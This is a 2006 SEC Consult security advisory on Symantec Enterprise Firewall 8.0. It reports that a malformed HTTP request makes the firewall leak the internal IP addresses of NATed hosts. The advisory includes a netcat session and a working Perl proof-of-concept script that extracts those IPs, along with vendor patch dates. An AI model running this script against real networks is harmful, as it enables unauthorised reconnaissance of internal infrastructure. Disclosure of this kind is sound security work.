Symantec Enterprise Firewall NAT/HTTP

SEC-CONSULT Security Advisory 20060512-0

===========================================================================

title: Symantec Enterprise Firewall NAT/HTTP

Proxy Private IP Exposure

program: Symantec Enterprise FW

vulnerable version: 8.0

homepage: www.symantec.com

found: 2005-09-13

by: SEC Consult / www.sec-consult.com

===========================================================================

 

Vendor description:

---------------

 

Symantec's Enterprise Firewall provides complete network protection by integrating smart application-level proxies, network circuits and packet filtering into a special perimeter-security architecture (...)

 

 

Vulnerabilty overview:

---------------

 

Enterprise FW leaks internal IPs of natted machines in response to certain HTTP requests.

 

 

Vulnerability details:

---------------

 

A request of the form "get/XX HTTP/1.0" (note the missing space) triggers the exposure. The firewall seems to forward the request and to wait a certain time for a reply from the webserver, until the timeout is reaches. the final response from the firewall looks like:

 

df0rm@b4byl0n:~> netcat www.behind-raptor.com 80

get/01 http/1.0

HTTP/1.1 504 Gateway Timeout

MIME-Version: 1.0

Server: Simple, Secure Web Server 1.1

Date: Tue, 13 Sep 2005 06:23:32 GMT

Connection: close

Content-Type: text/html

 

[...]

 

The request seen by the firewall was:

  • 10.238.94.57/01 Here's a simple script to map external to internal IPs. --------------- #!/usr/bin/perl # [title] raptor firewall internal IP disclosure 'exploit' # [mailto] research [at] sec-consult [dot} com # # sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com # waiting for timeout (this can take about 1 min.) # behind.raptor.com: 10.238.94.67 use IO::Socket; $| = 1; $host = $ARGV[0] or die "$0 <host>\n"; $request = "getXXX/XXX HTTP/1.0\n\n"; my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', ); die "could not open socket: $!\n" unless $sock; print $sock $request; print "waiting for timeout (this can take about 1 min.)\n"; while (<$sock>) { if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) { $ip = $1; } } if (defined($ip)) { print "$host: $ip\n"; } else { print "failed.\n"; } close($sock); vendor status: --------------- vendor notified: 2005-09-13 vendor response: 2005-09-13 patch available: 2005-12 General remarks --------------- We would like to apologize in advance for potential nonconformities and/or known issues. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Blindengasse 3 A-1080 Wien Austria Tel.: +43 / 1 / 409 0307 - 570 Fax.: +43 / 1 / 409 0307 - 590 Mail: office at sec-consult dot com www.sec-consult.com EOF SEC Consult / @2006 research at sec-consult dot com